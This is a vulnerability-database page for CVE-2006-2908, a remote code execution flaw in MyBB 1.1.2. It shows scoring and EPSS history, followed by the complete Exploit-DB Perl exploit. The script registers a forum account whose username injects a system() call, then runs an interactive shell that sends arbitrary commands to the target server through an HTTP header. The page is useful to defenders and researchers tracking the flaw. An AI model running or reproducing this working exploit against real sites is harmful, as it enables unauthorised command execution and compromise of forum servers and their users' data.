CVE-2006-2908

EPSS

9.7%V4

Vector

Network

Published

2006-06-12
23h00 +00:00

Modified

2018-10-18
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The domecode function in inc/functions_post.php in MyBulletinBoard (MyBB) 1.1.2, and possibly other versions, allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	20.72%	–
2023-04-16	–	–	–	46.14%	–
2023-11-05	–	–	–	53.06%	–
2023-12-24	–	–	–	57.18%	–
2024-02-11	–	–	–	57.18%	–
2024-02-18	–	–	–	62.73%	–
2024-06-02	–	–	–	78.8%	–
2024-06-02	–	–	–	78.8%	–
2024-10-06	–	–	–	80.93%	–
2024-12-22	–	–	–	5.79%	–
2025-01-19	–	–	–	5.79%	–
2025-03-18	–	–	–	–	10.19%
2025-03-30	–	–	–	–	9.7%
2025-05-01	–	–	–	–	9.7%
2025-05-01	–	–	–	–	9.7,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	96%
2023-04-16	97%
2023-11-05	97%
2023-12-24	97%
2024-02-11	98%
2024-02-18	98%
2024-06-02	98%
2024-06-02	98%
2024-10-06	98%
2024-12-22	93%
2025-01-19	93%
2025-03-18	93%
2025-03-30	92%
2025-05-01	93%
2025-05-01	93%

Exploit information

Exploit Database EDB-ID : 1909

Publication date : 2006-06-12 22h00 +00:00
Author : Javier Olascoaga
EDB Verified : Yes

#!/usr/bin/perl # Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es # # Exploit HOWTO - read this before flood my Inbox you bitch! # # - First you need to create the special user to do this use: # ./mybibi.pl --host=http://www.example.com --dir=/mybb -1 # this step needs a graphic confirmation so the exploit writes a file # in /tmp/file.png, you need to # see this img and put the text into the prompt. If everything is ok, # you'll have a new valid user created. # * There is a file mybibi_out.html where the exploit writes the output # for debugging. # - After you have created the exploit or if you have a valid non common # user, you can execute shell commands. # # TIPS: # * Sometimes you have to change the thread Id, --tid is your friend ;) # * Don't forget to change the email. You MUST activate the account. # * Mejor karate aun dentro ti. # # LIMITATIONS: # * If the admin have the username lenght < 28 this exploit doesn't works # # Greetz to !dSR ppl and unsec # # 514 still r0xing! # user config. my $uservar = "C"; # don't use large vars. my $password = "514r0x"; my $email = "514\@mailinator.com"; use LWP::UserAgent; use HTTP::Cookies; use LWP::Simple; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; $| = 1; # you can choose this or another one. my ($proxy,$proxy_user,$proxy_pass, $username); my ($host,$debug,$dir, $command, $del, $first_time, $tid); my ($logged, $tid) = (0, 2); $username = "'.system(getenv(HTTP_".$uservar.")).'"; my $options = GetOptions ( 'host=s' => \$host, 'dir=s' => \$dir, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'debug' => \$debug, '1' => \$first_time, 'tid=s' => \$tid, 'delete' => \$del); &help unless ($host); # please don't try this at home. $dir = "/" unless($dir); print "$host - $dir\n"; if ($host !~ /^http/) { $host = "http://".$host; } LWP::Debug::level('+') if $debug; my ($res, $req); my $ua = new LWP::UserAgent( cookie_jar=> { file => "$$.cookie" }); $ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); $ua->proxy(['http'] => $proxy) if $proxy; $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; create_user() if $first_time; while () { login() if !$logged; print "mybibi> "; # lost connection while(<STDIN>) { $command=$_; chomp($command); last; } &send($command); } sub send { chomp (my $cmd = shift); my $h = $host.$dir."/newthread.php"; my $req = POST $h, [ 'subject' => '514', 'message' => '/slap 514', 'previewpost' => 'Preview Post', 'action' => 'do_newthread', 'fid' => $tid, 'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa' ]; $req->header($uservar => $cmd); print $req->as_string() if $debug; my $res = $ua->request($req); if ($res->content =~ /You may not post in this/) { print "[!] don't have perms to post. Change the Forum ID\n"; } else { my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is; print $data; } } sub login { my $h = $host.$dir."/member.php"; my $req = POST $h,[ 'username' => $username, 'password' => $password, 'submit' => 'Login', 'action' => 'do_login' ]; my $res = $ua->request($req); if ($res->content =~ /You have successfully been logged/is) { print "[*] Login succesful!\n"; $logged = 1; } else { print "[!] Error login-in\n"; } } sub help { print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n"; print "\t--proxy (http), --proxy_user, --proxy_pass\n"; print "\t--debug\n"; print "the default directory is /\n"; print "\nExample\n"; print "bash# $0 --host=http(s)://www.server.com/\n"; print "\n"; exit(1); } sub create_user { # firs we need to get the img. my $h = $host.$dir."/member.php"; print "Host: $h\n"; $req = HTTP::Request->new (GET => $h."?action=register"); $res = $ua->request ($req); my $req = POST $h, [ 'action' => "register", 'agree' => "I Agree" ]; print $req->as_string() if $debug; $res = $ua->request($req); my $content = $res->content(); $content =~ m/.*(image\.php\?action.*?)\".*/is; my $img = $1; my $req = HTTP::Request->new (GET => $host.$dir."/".$img); $res = $ua->request ($req); print $req->as_string(); if ($res->content) { open (TMP, ">/tmp/file.png") or die($!); print TMP $res->content; close (TMP); print "[*] /tmp/file.png created.\n"; } my ($hash) = $img =~ m/hash=(.*?)$/; my $img_str = get_img_str(); unlink ("/tmp/file.png"); $img_str =~ s/\n//g; my $req = POST $h, [ 'username' => $username, 'password' => $password, 'password2' => $password, 'email' => $email, 'email2' => $email, 'imagestring' => $img_str, 'imagehash' => $hash, 'allownotices' => 'yes', 'receivepms' => 'yes', 'pmpopup' => 'no', 'action' => "do_register", 'regsubmit' => "Submit Registration" ]; $res = $ua->request($req); print $req->as_string() if $debug; open (OUT, ">mybibi_out.html"); print OUT $res->content; print "Check $email for confirmation or mybibi_out.html if there are some error\n"; } sub get_img_str () { print "\nNow I need the text shown in /tmp/file.png: "; my $str = <STDIN>; return $str; } exit 0; # milw0rm.com [2006-06-13]